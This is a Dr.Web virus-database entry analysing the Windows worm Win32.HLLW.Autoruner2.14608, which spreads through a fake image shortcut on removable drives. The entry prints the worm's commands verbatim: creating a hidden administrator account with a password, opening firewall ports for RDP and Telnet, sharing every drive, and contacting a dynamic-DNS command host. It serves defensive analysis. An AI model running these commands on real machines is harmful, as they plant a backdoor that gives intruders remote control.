Win32.HLLW.Autoruner2.14608
Added to the Dr.Web virus database:
2014-05-10
Virus description added:
2014-05-22
Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'LoadOrderVerification' = '%WINDIR%\iexplorer.exe'
Creates the following services:
- [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\lanmanserver] 'Start' = '00000002'
Creates the following files on removable media:
- <Drive name for removable media>:\Cristiano Ronaldo.jpg.lnk
Malicious functions:
To bypass firewall, removes or modifies the following registry keys:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\tlntsvr.exe' = '<SYSTEM32>\tlntsvr.exe:*:Enabled:iexplorer'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%WINDIR%\iexplorer.exe' = '%WINDIR%\iexplorer.exe:*:Enabled:iexplorer.exe'
Creates and executes the following:
Executes the following:
- '<SYSTEM32>\netsh.exe' firewall set allowedprogram <SYSTEM32>\tlntsvr.exe iexplorer enable
- '<SYSTEM32>\net1.exe' localgroup "Utilisateurs du Bureau р distance" ASPENET /add
- '<SYSTEM32>\net1.exe' localgroup "Remote desktop users" ASPENET /add
- '<SYSTEM32>\netsh.exe' firewall set service type = fileandprint mode = enable
- '<SYSTEM32>\net1.exe' start lanmanserver
- '<SYSTEM32>\sc.exe' config lanmanserver start= auto
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s ASPENET /add
- '<SYSTEM32>\net1.exe' share b$=b:\
- '<SYSTEM32>\net1.exe' share v$=v:\
- '<SYSTEM32>\net1.exe' share c$=c:\
- '<SYSTEM32>\net1.exe' localgroup administrateurs ASPENET /add
- '<SYSTEM32>\net1.exe' user ASPENET 159482637 /add
- '<SYSTEM32>\net1.exe' share n$=n:\
- '<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
- '<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\software\microsoft\Windows\CurrentVersion\Run" /v LoadOrderVerification /t REG_SZ /d "%WINDIR%\iexplorer.exe" /f
- '<SYSTEM32>\net1.exe' user ASPENET /active:yes
- '<SYSTEM32>\netsh.exe' firewall add portopening TCP 3389 "Romet Desktop"
- '<SYSTEM32>\netsh.exe' firewall add portopening TCP 3389 "Bureau р distance"
- '<SYSTEM32>\net1.exe' start TermService
- '<SYSTEM32>\sc.exe' start tlntsvr
- '<SYSTEM32>\sc.exe' config tlntsvr start= auto
- '<SYSTEM32>\reg.exe' add "hklm\system\currentControlSet\Control\Lнsa" /v "forceguest" /t REG_DWORD /d 0x0 /f
- '<SYSTEM32>\sc.exe' config TermService start= auto
- '<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
- '<SYSTEM32>\tlntsvr.exe'
- '<SYSTEM32>\net1.exe' share y$=y:\
- '<SYSTEM32>\net1.exe' share t$=t:\
- '<SYSTEM32>\net1.exe' share r$=r:\
- '<SYSTEM32>\net1.exe' share o$=o:\
- '<SYSTEM32>\net1.exe' share i$=i:\
- '<SYSTEM32>\net1.exe' share u$=u:\
- '<SYSTEM32>\net1.exe' share e$=e:\
- '<SYSTEM32>\netsh.exe' firewall set service type = remotedesktop mode = enable
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List" /v "%WINDIR%\iexplorer.exe" /t REG_SZ /d "%WINDIR%\iexplorer.exe:*:Enabled:iexplorer.exe" /f
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\ASPENET.bat
- '<SYSTEM32>\net1.exe' share z$=z:\
- '<SYSTEM32>\net1.exe' share a$=a:\
- '<SYSTEM32>\reg.exe' add "HKLM\software\microsoft\windows NT\CurrentVersion\Winlogon\specialaccounts\UserList" /v ASPENET /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net1.exe' share l$=l:\
- '<SYSTEM32>\net1.exe' share k$=k:\
- '<SYSTEM32>\net1.exe' share j$=j:\
- '<SYSTEM32>\net1.exe' share x$=x:\
- '<SYSTEM32>\net1.exe' share w$=w:\
- '<SYSTEM32>\net1.exe' share m$=m:\
- '<SYSTEM32>\net1.exe' share h$=h:\
- '<SYSTEM32>\net1.exe' share s$=s:\
- '<SYSTEM32>\net1.exe' share q$=q:\
- '<SYSTEM32>\net1.exe' share p$=p:\
- '<SYSTEM32>\net1.exe' share g$=g:\
- '<SYSTEM32>\net1.exe' share f$=f:\
- '<SYSTEM32>\net1.exe' share d$=<Drive name for removable media>:\
Modifies file system :
Creates the following files:
- %WINDIR%\ASPENET.bat
- <Current directory>\SchedLgUt.Txt
- %WINDIR%\iexplorer.exe
- %WINDIR%\Grpvinc.cpe
Network activity:
Connects to:
- 'any':58008
- 'py####a.no-ip.biz':58008
UDP:
- DNS ASK py####a.no-ip.biz
Miscellaneous:
Searches for the following windows:
- ClassName: '#32770' WindowName: 'Gestionnaire des t?ches de Windows'
- ClassName: '#32770' WindowName: '(null)'
- ClassName: 'SysListView32' WindowName: 'processus'
- ClassName: 'TApplication' WindowName: '<Virus name>'
- ClassName: 'MS_WINHELP' WindowName: '(null)'
- ClassName: 'TApplication' WindowName: 'iexplorer'
欢迎下载
Dr.Web for Android
-
免费3个月
-
可使用所有保护组件
-
可在AppGallery/Google Pay延期
继续使用此网站意味着您同意我们使用Cookie文件和其他用于收集网站访问统计信息的技术手段。详细信息